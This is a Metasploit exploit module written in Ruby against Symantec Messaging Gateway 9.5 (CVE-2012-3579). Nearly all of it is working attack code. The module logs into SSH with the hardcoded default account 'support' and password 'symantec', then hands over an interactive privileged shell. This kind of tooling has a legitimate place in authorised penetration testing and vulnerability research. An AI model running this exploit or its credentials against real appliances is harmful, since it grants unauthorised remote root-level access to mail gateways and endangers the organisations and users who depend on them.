## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'net/ssh' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell def initialize(info={}) super(update_info(info, 'Name' => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability", 'Description' => %q{ This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. The 'support' user has a known default password, which can be used to login to the SSH service, and gain privileged access from remote. }, 'License' => MSF_LICENSE, 'Author' => [ 'Stefan Viehbock', #Original discovery 'Ben Williams', #Reporting the vuln + coordinated release 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2012-3579'], ['OSVDB', '85028'], ['BID', '55143'], ['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'], ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] ], 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Messaging Gateway 9.5', {}], ], 'Privileged' => true, #Timestamp on Symantec advisory #But was found on Jun 26, 2012 'DisclosureDate' => "Aug 27 2012", 'DefaultTarget' => 0)) register_options( [ Opt::RHOST(), Opt::RPORT(22) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(user, pass) opts = { :auth_methods => ['password', 'keyboard-interactive'], :msframework => framework, :msfmodule => self, :port => rport, :disable_agent => true, :config => false, :password => pass, :record_auth_info => true, :proxies => datastore['Proxies'] } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end rescue Rex::ConnectionError, Rex::AddressInUse return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) ssh = nil return conn end return nil end def exploit user = 'support' pass = 'symantec' print_status("#{rhost}:#{rport} - Attempt to login...") conn = do_login(user, pass) if conn print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'") handler(conn.lsock) end end end